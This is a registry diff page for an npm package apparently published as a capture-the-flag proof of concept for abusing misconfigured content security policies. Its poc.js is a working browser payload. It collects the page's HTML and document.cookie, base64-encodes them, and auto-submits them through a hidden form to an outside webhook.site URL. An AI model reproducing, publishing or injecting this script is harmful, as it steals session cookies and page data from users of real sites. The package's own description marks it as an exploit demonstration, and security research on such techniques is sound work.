@milymilo/ctf-poc-unpkg 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @milymilo/ctf-poc-unpkg might be problematic. Click here for more details.
- package/README.md +5 -0
- package/package.json +11 -0
- package/poc.js +28 -0
package/README.md
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@milymilo/ctf-poc-unpkg",
|
|
3
|
+
"version": "1.0.2",
|
|
4
|
+
"description": "DO NOT USE - This package is a PoC exploit demonstrating data exfiltration via public CDN networks abusing misconfigured CSP.",
|
|
5
|
+
"main": "poc.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|
package/poc.js
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
1
|
+
const vForm = (action, method, fields) => {
|
|
2
|
+
const form = document.createElement('form')
|
|
3
|
+
form.setAttribute('hidden', 'true')
|
|
4
|
+
form.setAttribute('action', action)
|
|
5
|
+
form.setAttribute('method', method)
|
|
6
|
+
|
|
7
|
+
fields.forEach(field => {
|
|
8
|
+
const tmp = document.createElement('input')
|
|
9
|
+
tmp.setAttribute('type', field.type || 'text')
|
|
10
|
+
tmp.setAttribute('name', field.name || '')
|
|
11
|
+
tmp.setAttribute('value', field.value || '')
|
|
12
|
+
form.appendChild(tmp)
|
|
13
|
+
})
|
|
14
|
+
|
|
15
|
+
document.body.appendChild(form)
|
|
16
|
+
form.submit()
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
(async () => {
|
|
20
|
+
const data = btoa(JSON.stringify({
|
|
21
|
+
document: document.documentElement.innerHTML,
|
|
22
|
+
cookies: document.cookie
|
|
23
|
+
}));
|
|
24
|
+
|
|
25
|
+
vForm("https://webhook.site/c1289a5d-3cd8-4178-9f11-678cc96f225a", 'POST', [
|
|
26
|
+
{ name: 'data', value: data },
|
|
27
|
+
]);
|
|
28
|
+
})()
|